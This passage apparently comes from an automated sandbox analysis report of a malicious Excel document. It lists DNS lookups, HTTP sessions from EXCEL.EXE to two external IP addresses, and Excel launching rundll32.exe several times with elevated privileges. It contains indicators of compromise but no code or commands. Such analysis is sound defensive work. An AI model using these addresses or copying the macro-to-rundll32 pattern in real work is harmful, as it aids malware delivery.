Apr 7, 2021 17:37:01.528115034 CEST | 80 | 49719 | 185.82.219.75 | 192.168.2.5 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 7, 2021 17:34:58.351875067 CEST | 65307 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:34:58.364454985 CEST | 53 | 65307 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:34:58.870826006 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:34:58.884255886 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:34:59.193109989 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:34:59.205982924 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:34:59.796698093 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:34:59.810400009 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:01.967953920 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:01.982530117 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:02.995198011 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:03.008181095 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:05.887080908 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:05.907430887 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:11.519834042 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:11.577848911 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:11.996236086 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:12.017131090 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:12.998294115 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:13.011636019 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:14.058377028 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:14.078953028 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:16.070971012 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:16.084076881 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:20.086781979 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:20.097259998 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:20.100059032 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:20.109745979 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:21.324604988 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:21.338169098 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:23.861440897 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:23.874171019 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:25.492499113 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:25.505495071 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:27.621049881 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:27.641642094 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:31.248034000 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:31.262487888 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:33.420664072 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:33.434581041 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:34.953347921 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:34.966614962 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:41.939289093 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:41.953826904 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:44.977627993 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:44.997548103 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:54.416148901 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:54.443725109 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:35:57.611288071 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:35:57.623776913 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:36:00.173840046 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:36:00.187432051 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:36:19.070545912 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:36:19.097323895 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:36:39.680593014 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:36:39.696135044 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:36:42.336549997 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:36:42.364864111 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:40.883125067 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:40.946337938 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:41.412671089 CEST | 53813 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:41.487431049 CEST | 53 | 53813 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:41.748771906 CEST | 63732 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:41.870615005 CEST | 53 | 63732 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:42.142398119 CEST | 57344 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:42.224147081 CEST | 53 | 57344 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:42.595407009 CEST | 54450 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:42.608704090 CEST | 53 | 54450 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:42.965485096 CEST | 59261 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:42.978367090 CEST | 53 | 59261 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:43.287322044 CEST | 57151 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:43.300596952 CEST | 53 | 57151 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:43.696594954 CEST | 59413 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:43.710262060 CEST | 53 | 59413 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:44.463150024 CEST | 60516 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:44.476830959 CEST | 53 | 60516 | 8.8.8.8 | 192.168.2.5 |
Apr 7, 2021 17:37:44.744183064 CEST | 51649 | 53 | 192.168.2.5 | 8.8.8.8 |
Apr 7, 2021 17:37:44.757565022 CEST | 53 | 51649 | 8.8.8.8 | 192.168.2.5 |
HTTP Request Dependency Graph |
---|
|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.5 | 49718 | 188.119.112.114 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 17:35:36.704644918 CEST | 1363 | OUT | |
Apr 7, 2021 17:35:36.932835102 CEST | 1363 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.5 | 49719 | 185.82.219.75 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 7, 2021 17:35:36.986771107 CEST | 1364 | OUT | |
Apr 7, 2021 17:35:37.204653025 CEST | 1365 | IN |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Memory Usage |
---|
High Level Behavior Distribution |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 17:35:10 |
Start date: | 07/04/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xa30000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:35:36 |
Start date: | 07/04/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x9a0000 |
File size: | 61952 bytes |
MD5 hash: | D7CA562B0DB4F4DD0F03A89A1FDAD63D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:35:37 |
Start date: | 07/04/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x9a0000 |
File size: | 61952 bytes |
MD5 hash: | D7CA562B0DB4F4DD0F03A89A1FDAD63D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:35:38 |
Start date: | 07/04/2021 |
Path: | C:\Windows\SysWOW64\rundll32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x9a0000 |
File size: | 61952 bytes |
MD5 hash: | D7CA562B0DB4F4DD0F03A89A1FDAD63D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|